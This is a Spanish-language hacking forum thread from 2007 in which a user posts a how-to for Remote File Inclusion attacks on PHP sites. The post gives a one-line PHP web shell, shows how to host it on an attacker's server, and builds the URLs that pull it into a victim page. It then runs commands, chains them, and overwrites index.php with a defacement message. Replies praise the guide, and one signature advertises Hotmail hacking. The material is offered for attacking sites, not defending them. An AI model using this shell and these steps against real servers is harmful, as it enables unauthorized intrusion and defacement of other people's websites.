hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
26 de Julio de 2008, 04:05:32
Noticias: Te gusta el nuevo diseño?
Opina al respecto en:
Para ver este enlace Registrate o Inicia Sesion
Este Tema

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderadores: CHR0N05, vengador de las sombras)
| | |-+  a ataque RFI
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: a ataque RFI  (Leído 594 veces)
Desnos
NZ1
*
Desconectado Desconectado

Mensajes: 33


Ver Perfil
« : 09 de Julio de 2007, 08:15:11 »

bueno amigos esto es básicamente un ataque que se realiza a url en php,
Esta vulneravilidad solo existe en Paginas programas en PHP, que permitan agregar enlaces a archivos remotos situados en otros servidores y paginas web, sea provocada por un error al programar, En la cual Puedes entrar a muchos lugares con los siguientes comandos.

La pagina puede ser vulnerable a ataques RFI si la url es similar a esta que tenemos aqui:

http://[servidor_victima]/index.php?.

Para obtener la shell de la web solo necesitamos este codigo:

http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.

Esa seria una web vulnerable como Ejemplo:http//ww.rush.com/index.php?

Para poder hacer un ataque RFI tendremos que hacer esto:

http://www.rush.com/index.php?page=h...?&cmd=(comando)

Para saber si es vulnerable en el block de notas se escribe lo siguinte:

<?

system($cmd)

?>

ahora lo guardamos con el nombre de shell.txt y lo subimos a un servidor, de preferencia que no sea php para que no se ejecute en el nuestro (servidor)

ahora procedemos a usar esto:

http://www.rush.com/index.php?page=h...txt?&cmd=(aqui va el comando.)

y listo asi se podrá explorar el comando.

Un ejemplo de una shell explotada:

http://www.rush.com/index.php?page=h...l.txt?&cmd=pwd

pwd—> nos muestra en que parte del servidor estamos por ejemplo:

Home/host/www

Una Shell para sobreescribir un archivo es:

/shell.txt?&cmd=Defaced By: rUsH >index.php.

Para ejecutar mas de un comando solo se usa esto “;”

/shell.txt?&cmd=[coamando];[Comando];[Comando]

Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar se usa este comando

/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos

Para saber los datos de la DB se usa este comando:

/shell.txt?&cmd=cd

y listo bueno hay mas cosas que se puedes agregar para conseguir mas cosas solo hace falta la imaginación y la paciencia
bueno espero que séa una buena utilidad.


Saludos  kool
En línea
thepakito0ox
NZ1
*
Desconectado Desconectado

Mensajes: 51


Para que valiente cuando inteligente es suficiente


Ver Perfil
« Respuesta #1 : 11 de Julio de 2007, 07:41:48 »

todo esto en la consola??? (cmd)??


saludos

TPX
En línea

T.P.X    [HackiNg & SecuriTy]

Para ver este enlace Registrate o Inicia Sesion
Ther0x
NZ3
***
Desconectado Desconectado

Mensajes: 836


Ther0x returns... And stronger than ever...


Ver Perfil WWW
« Respuesta #2 : 11 de Julio de 2007, 11:48:40 »

Yo he visto shells que tienen interfaz gráfica en las que no hay que escribir comandos del dos.
En línea


Para ver este enlace Registrate o Inicia Sesion
Microship
Recien llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil
« Respuesta #3 : 12 de Julio de 2007, 07:43:55 »

aqui no se utiliza ningun comando del dos , la shell de windows.

todo eso se hace en la url al aplicar la shell.


Saludos

pd : se utiliza la shell de windows o cmd como algunas otras personas lo llaman cuando se va a rootear el server.
« Última modificación: 12 de Julio de 2007, 07:44:48 por Microship » En línea
Desnos
NZ1
*
Desconectado Desconectado

Mensajes: 33


Ver Perfil
« Respuesta #4 : 17 de Julio de 2007, 11:17:54 »

[pd : se utiliza la shell de windows o cmd como algunas otras personas lo llaman cuando se va a rootear el server.
[/quote]

se utiliza la shell de windows,  se aplica directamente en la url, es una ataque directo a las vulnerabilidad es que te mencioné mas arriba.
con las características y los fallos al programar en php.



Para saber si es vulnerable en el block de notas se escribe lo siguinte:

<?

system($cmd)

?>

ahora lo guardamos con el nombre de shell.txt y lo subimos a un servidor, de preferencia que no sea php para que no se ejecute en el nuestro (servidor)



bueno espero que se entienda

saludos

Desnos  kool
En línea
vart001
Administrador
*****
Desconectado Desconectado

Mensajes: 1,553


El Mero, mero!


Ver Perfil WWW
« Respuesta #5 : 17 de Julio de 2007, 02:04:30 »

muy buena explicacion Desnos
importante resaltar que RFI por sus siglas en ingles se refiere a:
RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos.

No es un Bug nuevo ni biejo, pero muy comun en sitios programados por novatos..

En línea

root from cph


Para ver este enlace Registrate o Inicia Sesion
Hackear hotmail aqui

WaesWaes
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1,358


Señor de Outland, de la sentencia del Templo Negro


Ver Perfil WWW
« Respuesta #6 : 17 de Julio de 2007, 03:05:24 »

que exelente explicacion la verdad que es para felicitarte desnos
y ademas me cae al pelo para probar con esas pajinas php
voy a probar con portalhacker.n et huajajajajajaj ajaja
naaaaaaa mentira Wink Grin Grin Grin
En línea


Para ver este enlace Registrate o Inicia Sesion

Cita de: Mejor usuario de cph
1.WaesWaes, 2.Alfa, 3.TxShack
Desnos
NZ1
*
Desconectado Desconectado

Mensajes: 33


Ver Perfil
« Respuesta #7 : 18 de Julio de 2007, 10:52:11 »

muy buena explicacion Desnos
importante resaltar que RFI por sus siglas en ingles se refiere a:
RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos.

No es un Bug nuevo ni biejo, pero muy comun en sitios programados por novatos..


es verdad, me faltaba explicar que significaba la sigla RFI, como muy bien explico vart001 , ademas es un un bug que se comete al programar en php, normalmente el programador que no tiene mucha experiencia deja en php deja ese bug sin darse cuenta  y comete errores al programar o compilar.

bueno espero que sirva este aporte
y gracias vart001 por explicar lo que faltaba.
saludos a todos.

 kool
En línea
- TuX -
Colaborador
****
Desconectado Desconectado

Mensajes: 366


Tux, El Mejor Amigo Del Hacker


Ver Perfil
« Respuesta #8 : 18 de Julio de 2007, 11:37:30 »

Buen aporte, esto es muy ineresante, Wink
En línea



Master Yoshi
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online